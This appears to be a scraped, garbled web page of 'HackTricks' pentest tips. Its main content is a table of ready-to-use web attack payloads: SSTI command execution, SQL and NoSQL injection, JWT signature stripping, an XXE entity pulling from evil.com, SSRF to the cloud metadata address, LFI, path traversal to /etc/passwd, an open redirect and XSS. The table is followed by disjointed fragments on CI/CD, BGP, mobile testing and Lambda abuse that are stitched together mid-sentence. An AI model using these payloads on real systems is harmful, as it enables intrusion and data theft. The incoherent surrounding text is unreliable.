Hacktricks 179 Best

Purple team exercises to validate detections - Run attacks and verify SIEM/EDR detection, refine rules.

| # | Trick | Example / Payload | |---|-------|--------------------| | 61 | SSTI (Jinja2) | config.__class__.__init__.__globals__['os'].popen('id').read() | | 62 | SQLi UNION extract DB | ' UNION SELECT @@version,user(),database() -- - | | 63 | NoSQLi (MongoDB) | '$ne': '' or ';return true;var foo=' | | 64 | GraphQL introspection | __schematypesname,fieldsname | | 65 | JWT none algorithm | Change alg to none , remove signature | | 66 | XXE (out-of-band) | <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://evil.com/xxe"> %xxe;]> | | 67 | SSRF to internal metadata | http://169.254.169.254/latest/meta-data/ | | 68 | LFI to RCE (PHP) | php://filter/convert.base64-encode/resource=index.php | | 69 | Path traversal | ....//....//....//etc/passwd | | 70 | Open redirect | ?redirect=https://evil.com | | ... | ... | ... | | 90 | CSP bypass (unsafe-inline) | ?name=<script>alert(1)</script> | hacktricks 179 best

focusing on CI/CD methodologies and cloud-specific misconfigurations. Mobile Pentesting : Comprehensive checklists for both Android APK iOS applications , covering insecure data storage and IPC vulnerabilities. HackTricks Essential Tools Highlighted HackTricks often points to specific "best-in-class" tools: Purple team exercises to validate detections - Run

Staff email permutation generation

: Routers only accept BGP packets with a Time-to-Live (TTL) of 255, ensuring the sender is directly connected and not a remote attacker. !DOCTYPE foo [&lt

Serverless function abuse (AWS Lambda) - Upload functions or use exposed endpoints to execute code.